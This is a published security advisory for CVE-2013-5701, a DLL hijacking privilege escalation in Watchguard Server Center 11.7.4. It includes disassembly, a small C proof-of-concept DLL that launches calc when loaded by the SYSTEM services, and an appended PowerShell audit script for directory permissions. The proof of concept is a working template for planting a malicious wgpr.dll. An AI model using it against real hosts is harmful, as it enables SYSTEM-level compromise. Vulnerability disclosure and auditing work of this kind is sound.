Watchguard Server Center 11.7.4 Insecure Library Loading

Posted Sep 9, 2013
Authored by Julien Ahrens | Site rcesecurity.com

Watchguard Server Center version 11.7.4 suffers from a DLL hijacking vulnerability involving wgpr.dll.

tags | exploit
systems | windows
advisories | CVE-2013-5701
SHA-256 | b67a720d0a797532d0f3e4fea6a5b7cd8823f0a69b548c11cca0352f1007db8e

Watchguard Server Center v11.7.4 wgpr.dll Insecure Library Loading Local
Privilege Escalation Vulnerability

RCE Security Advisory
http://www.rcesecurity.com


1. ADVISORY INFORMATION
-----------------------
Product: Watchguard Server Center
Vendor URL: www.watchguard.com
Type: Uncontrolled Search Path Element [CWE-427]
Date found: 2013-07-29
Date published: 2013-08-09
CVSSv2 Score: 6.6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)
CVE: CVE-2013-5701


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
--------------------
Watchguard Server Center v11.7.4
Watchguard Server Center v11.7.3
and other older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in two
service components of the Watchguard Server Center v11.7.4.

The application installs two services "Watchguard Log Collector"
(%installdir%\wsm11\wlcollector\bin\wlcollector.exe)
and "Watchguard WebBlocker Server"
(%installdir%\wsm11\wbserver\bin\wbserver.exe).

Both services use a fixed search path to look for specific files or
libraries. This path includes directories that may be untrusted or under
user control.

By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an attacker
to inject custom code that will be run with the privileges of the program or
of the user executing the program. The following library can be hijacked in
this way:

wgpr.dll

Since both services are running using the SYSTEM account, this may allow a
less privileged user to gain access to SYSTEM privileges. A local attacker
or compromised process is able to put a malicious application library into
the directory which will be executed after a service restart.

On a default installation (%programfiles%\Watchguard) of the Watchguard
Server Center on Windows Vista and above, the directory permissions prevent
a low-privileged attacker from mounting the attack.

On a default installation (%programfiles%\Watchguard) of the Watchguard
Server Center on Windows XP, the attacker needs to have at least Power User
rights to successfully mount the attack.

On a non-default installation of the Watchguard Server Center to a
directory, which is writeable by a low-privileged user, the attack can be
mounted successfully without any restrictions.


5. DEBUG INFORMATION
--------------------
The vulnerable code part of wlcollector.exe:

00401691 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401697 MOV ESI,EAX
00401699 TEST ESI,ESI
0040169B JE SHORT wlcollec.004016B3
0040169D PUSH wlcollec.00409320 ; /ProcNameOrOrdinal
004016A2 PUSH wlcollec.00409310 ; |/FileName = "kernel32.dll"
004016A7 CALL EDI ; |\LoadLibraryA
004016A9 PUSH EAX ; |hModule
004016AA CALL EBX ; \GetProcAddress
004016AC TEST EAX,EAX
004016AE JE SHORT wlcollec.004016B3
004016B0 PUSH ESI
004016B1 CALL EAX
004016B3 PUSH wlcollec.00409304 ; ASCII "wgpr.dll"
004016B8 CALL EDI ; kernel32.LoadLibraryA

The vulnerable code part of wbserver.exe:

00401041 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401047 MOV ESI,EAX
00401049 TEST ESI,ESI
0040104B JE SHORT wbserver.00401063
0040104D PUSH wbserver.00408284 ; /ProcNameOrOrdinal
00401052 PUSH wbserver.00408274 ; |/FileName = "kernel32.dll"
00401057 CALL EDI ; |\LoadLibraryA
00401059 PUSH EAX ; |hModule
0040105A CALL EBX ; \GetProcAddress
0040105C TEST EAX,EAX
0040105E JE SHORT wbserver.00401063
00401060 PUSH ESI
00401061 CALL EAX
00401063 PUSH wbserver.00408268 ; ASCII "wgpr.dll"
00401068 CALL EDI


6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:

#include <windows.h>

#define DLL_EXPORT __declspec(dllexport)

#ifdef __cplusplus
extern "C"
{
#endif

/* Export provided by the PoC library; the services load "wgpr.dll" via
   LoadLibraryA (see section 5), so the planted DLL runs in the service's
   context. The PoC only launches the calculator to demonstrate execution. */
void DLL_EXPORT wgpr_library_get()
{
    WinExec("calc", 0);
}

#ifdef __cplusplus
}
#endif


7. SOLUTION
-----------
Administrators who installed the Watchguard Server Center on Windows XP or
outside the default installation folder should harden the permissions on
the mentioned directories (write access for administrators only) to lower
the attack risk.


8. REPORT TIMELINE
------------------
2013-07-29: Discovery of the vulnerability
2013-07-30: RCE Security sends first notification to Customer Care via mail
with disclosure date set to 13 August 2013
2013-08-05: RCE Security sends second notification using Twitter
2013-08-05: Response from vendor
2013-08-05: RCE Security sends vulnerability details to vendor
2013-08-05: Vendor ACKs the issue and asks for an extension of 30 days
2013-08-06: New disclosure date set to 13 September 2013
2013-08-06: Vendor assigns bug id #75251
2013-08-19: No further status updates received; RCE Security asks for a
status update according to its disclosure policy
2013-08-19: Vendor estimates the risk of the issue as "extremely limited"
and therefore ACKs the public disclosure
2013-08-28: Vendor plans to release the fix with the next major release in
around Q4
2013-09-05: MITRE assigns CVE-2013-5701 for this issue
2013-09-08: Full Disclosure


9. REFERENCES
-------------
https://www.rcesecurity.com/2013/09/cve-2013-5701-watchguard-server-center-v11-7-4-wgpr-dll-local-privileges-escalation-vulnerability/
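As a defender-side check for the hardening recommended in the SOLUTION section, here is an added PowerShell script that is not part of the advisory: it audits the ACLs of the two service directories named in section 4, reports any non-administrative principal that can write there, and records the Authenticode status of any wgpr.dll already present. The install root, the list of low-privileged principals and the write-rights mask are assumptions.

```powershell
param(
    # Install root assumed from the advisory's default; pass the real path for non-default installs.
    [string]$InstallDir = (Join-Path $env:ProgramFiles 'WatchGuard')
)
# Directories from which the two services resolve "wgpr.dll" (paths taken from the advisory).
$ServiceDirs = @(
    (Join-Path $InstallDir 'wsm11\wlcollector\bin'),
    (Join-Path $InstallDir 'wsm11\wbserver\bin')
)
# Groups a non-administrative local user is normally a member of (assumed list; extend as needed).
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Power Users')
# Any of these rights lets a principal plant or replace a file in the directory.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Test-WgprLoadDirectory {
    param([Parameter(Mandatory)][string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) {
        Write-Warning "Directory not found: $Dir"
        return
    }
    $findings = @()
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        $who = $ace.IdentityReference.Value
        # Generic rights may show up as raw numbers, so compare the masks as integers.
        $grantsWrite = (([int]$ace.FileSystemRights) -band ([int]$WriteMask)) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and
            ($LowPrivPrincipals -contains $who)) {
            $findings += [pscustomobject]@{
                Directory = $Dir; Principal = $who
                Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited
            }
        }
    }
    # If a wgpr.dll is already present, record whether its Authenticode signature verifies.
    $dll = Join-Path $Dir 'wgpr.dll'
    $sigStatus = if (Test-Path -LiteralPath $dll) {
        (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'NotPresent' }
    [pscustomobject]@{
        Directory = $Dir; WgprDllSignature = $sigStatus
        WritableByLowPriv = ($findings.Count -gt 0); Findings = $findings
    }
}

$results = $ServiceDirs | ForEach-Object { Test-WgprLoadDirectory -Dir $_ }
$results | Format-Table Directory, WritableByLowPriv, WgprDllSignature -AutoSize
$results | Where-Object WritableByLowPriv | ForEach-Object { $_.Findings } |
    Format-Table Principal, Rights, Inherited -AutoSize
```

Run it from an elevated prompt on the Server Center host; any row with WritableByLowPriv set to True is a directory whose ACL should be tightened as the advisory recommends.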

